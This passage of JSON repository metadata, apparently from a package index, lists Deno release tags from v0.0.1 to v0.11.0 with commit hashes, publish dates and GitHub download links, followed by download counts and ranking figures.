07T16:19:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0/manifests"},{"name":"v0.10.0","sha":"c56df45355c8e68eabbfa62021e7ca7484115c0b","kind":"tag","published_at":"2019-06-25T14:11:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0/manifests"},{"name":"v0.9.0","sha":"7b06aa37342c021f9f1fac99125847d134e67001","kind":"commit","published_at":"2019-06-15T16:04:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0/manifests"},{"name":"v0.8.0","sha":"d60bdb6350f2583e35d020f6cebb6aa30262fbcc","kind":"commit","published_at":"2019-06-08T19:16:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0/manifests"},{"name":"v0.7.0","sha":"5265bd7cb1f86af99b01d73c537d52a50df95fe2","kind":"commit","published_at":"2019-05-29T22:42:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0/manifests"},{"name":"v0.6.0","sha":"22feb74ba12215597416b5531f8a557302283e79","kind":"commit","published_at":"2019-05-20T19:22:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0/manifests"},{"name":"v0.5.0","sha":"23aca36d52220efbfbc07abbe165bd2c9ade2009","kind":"commit","published_at":"2019-05-11T21:19:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0/manifests"},{"name":"v0.4.0","sha":"2aae09c2b869bf5d0bc5fd269464e8ac504528ea","kind":"commit","published_at":"2019-05-03T23:33:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0/manifests"},{"name":"v0.3.11","sha":"3b1e2f1ad42cfebb6f2568e54c82c5ac3c8fe3d4","kind":"commit","published_at":"2019-05-03T22:05:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11/manifests"},{"name":"v0.3.10","sha":"40d8ef1ec9f5e50017c41af8bf3b9f8454f97544","kind":"tag","published_at":"2019-04-25T20:00:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10/manifests"},{"name":"v0.3.9","sha":"e725b26b289fbe96b679039ba4203f10f7229ab9","kind":"tag","published_at":"2019-04-25T15:46:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9/manifests"},{"name":"v0.3.8","sha":"0796a8f2f75005df95ef6115a4bdf6dd66e58dc3","kind":"commit","published_at":"2019-04-19T15:41:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8/manifests"},{"name":"v0.3.7","sha":"8584d80cfd26111825af5a69fc6ae4c367ad0700","kind":"commit","published_at":"2019-04-11T19:35:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7/manifests"},{"name":"v0.3.6","sha":"744e56cb58f90acde7baf8811676021fb55b2f2a","kind":"tag","published_at":"2019-04-04T14:04:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6/manifests"},{"name":"v0.3.5","sha":"b965c7ab367a417fb7bdde2eaf38312179e5c183","kind":"commit","published_at":"2019-03-28T20:58:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5/manifests"},{"name":"v0.3.4","sha":"223a2adbb46cb33e75ffe861ecaff6ff7e6d555e","kind":"commit","published_at":"2019-03-20T22:54:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4/manifests"},{"name":"v0.3.3","sha":"3dbb06e699398549e8cfabc896ef3256ab433cba","kind":"tag","published_at":"2019-03-13T18:16:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3/manifests"},{"name":"v0.3.2","sha":"535037b519711d238dc0bfa2c4d2ffb4b17dec53","kind":"commit","published_at":"2019-03-07T02:22:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2/manifests"},{"name":"v0.3.1","sha":"b0c7b54f692ecc866d4f70bfa384631523bbf924","kind":"commit","published_at":"2019-02-27T21:20:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1/manifests"},{"name":"v0.3.0","sha":"a5720d9e28f7ee5868049504816405392c2821d7","kind":"commit","published_at":"2019-02-19T04:22:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0/manifests"},{"name":"v0.2.11","sha":"b2fb8261e700c75cfb9a626ae57bbd3098e08454","kind":"commit","published_at":"2019-02-09T04:34:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11/manifests"},{"name":"v0.2.10","sha":"c3241822522fb2b13792fe5666596888057cf829","kind":"commit","published_at":"2019-02-02T23:26:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10/manifests"},{"name":"v0.2.9","sha":"1681bda14d1552860645e40f91f667accefe50cb","kind":"commit","published_at":"2019-01-30T03:57:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9/manifests"},{"name":"v0.2.8","sha":"a47d545e4d0831713d0107e86cead7b4506a9bf6","kind":"commit","published_at":"2019-01-19T16:54:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8/manifests"},{"name":"v0.2.7","sha":"eb4a19ef6ef1c5ae797fb515c45627deca65cf31","kind":"commit","published_at":"2019-01-15T01:25:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7/manifests"},{"name":"v0.2.6","sha":"404e6f86345216c9205cabb88b19eaca762095e0","kind":"commit","published_at":"2019-01-07T22:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6/manifests"},{"name":"v0.2.5","sha":"320577c131c8058ba0065f26119ce1ce18bc23d2","kind":"commit","published_at":"2019-01-01T19:30:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5/manifests"},{"name":"v0.2.4","sha":"c6e2fffc1388cdb4411d6c2cff36c4febb7c75d5","kind":"commit","published_at":"2018-12-24T04:39:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4/manifests"},{"name":"v0.2.3","sha":"c69d2f554d05ba9e4d09af6ae451ce5676876e61","kind":"commit","published_at":"2018-12-14T20:11:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3/manifests"},{"name":"v0.2.2","sha":"e6121762f8bf3c531c4c60229ff4a156ae21d931","kind":"commit","published_at":"2018-12-07T22:44:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2/manifests"},{"name":"v0.2.1","sha":"b5c6bfa0c8a3df9598211bc68db5408f5eec147d","kind":"commit","published_at":"2018-12-01T00:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1/manifests"},{"name":"v0.2.0","sha":"d083f7271b11d87ddba90869d2bcd2cf312e77af","kind":"commit","published_at":"2018-11-16T05:23:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0/manifests"},{"name":"v0.1.12","sha":"0c740ff85d855177d1619276154f63a36ed31557","kind":"commit","published_at":"2018-11-12T17:16:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12/manifests"},{"name":"v0.1.11","sha":"e1d5f82d36f08b9c7a7c6233b7ce354a5cf82836","kind":"commit","published_at":"2018-11-05T22:51:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11/manifests"},{"name":"v0.1.10","sha":"da959e8c878382ce3417ab61db8ccf1ae9a660fa","kind":"commit","published_at":"2018-10-27T15:13:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10/manifests"},{"name":"v0.1.9","sha":"c85311dd7dbad09242633d2ee7a83fdb1cbd1d7f","kind":"commit","published_at":"2018-10-21T00:30:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9/manifests"},{"name":"v0.1.8","sha":"d92c99eabaf28100a8d181b6f289e2e3fc295107","kind":"commit","published_at":"2018-10-12T18:44:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8/manifests"},{"name":"v0.1.7","sha":"5307aa94e14d99a226366a275e011a60161c9c39","kind":"commit","published_at":"2018-10-04T12:56:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7/manifests"},{"name":"v0.1.6","sha":"77e876388bf1b2b3959f25a1cb057a1f96c76ba7","kind":"commit","published_at":"2018-09-29T17:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6/manifests"},{"name":"v0.1.5","sha":"8e958d3ad68e610061e82fb9f456eab79330633e","kind":"commit","published_at":"2018-09-22T03:21:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5/manifests"},{"name":"v0.1.4","sha":"d38b3b585ca68f4bc9e95faa6c9c036dc8982575","kind":"commit","published_at":"2018-09-13T00:45:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4/manifests"},{"name":"v0.1.3","sha":"59f3fca166e7d3bd3095f9df0f7040defe3239e1","kind":"commit","published_at":"2018-09-06T03:08:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3/manifests"},{"name":"v0.1.2","sha":"cce3bd470b19e1c2eab6530d06c48949891a56fc","kind":"commit","published_at":"2018-08-30T22:29:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2/manifests"},{"name":"v0.1.1","sha":"c42e4ddbb7973bfb0c57a49ab6bf6dc432baad7e","kind":"commit","published_at":"2018-08-28T13:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1/manifests"},{"name":"v0.1.0","sha":"68d388229ea6ada339d68eb3d67feaff7a31ca97","kind":"commit","published_at":"2018-08-23T14:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0/manifests"},{"name":"v0.0.3","sha":"ca4ace6b1f054593029df4958538708c2fbbabc2","kind":"commit","published_at":"2018-08-22T16:08:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3/manifests"},{"name":"v0.0.2","sha":"6a8fbc8b522a710699bcf9738c2194dec797b428","kind":"commit","published_at":"2018-08-21T03:43:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2/manifests"},{"name":"v0.0.1","sha":"67d89ff692a88ae42145043eac1a5c58413ae110","kind":"commit","published_at":"2018-08-17T16:58:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1/manifests"}]},"repo_metadata_updated_at":"2026-09-08T13:16:43.563Z","dependent_packages_count":1,"downloads":14039,"downloads_period":"total","dependent_repos_count":0,"rankings":{"downloads":27.520321105541452,"dependent_repos_count":29.318292202377133,"dependent_packages_count":